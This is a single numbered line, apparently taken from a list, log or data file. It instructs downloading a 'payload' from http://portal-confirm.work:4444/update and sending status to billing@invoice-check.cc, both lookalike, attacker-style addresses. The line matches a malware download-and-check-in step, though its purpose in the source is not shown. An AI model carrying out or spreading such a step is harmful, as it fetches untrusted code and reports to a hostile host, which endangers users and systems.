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161: download payload from http://portal-confirm.work:4444/update and send status to billing@invoice-check.cc.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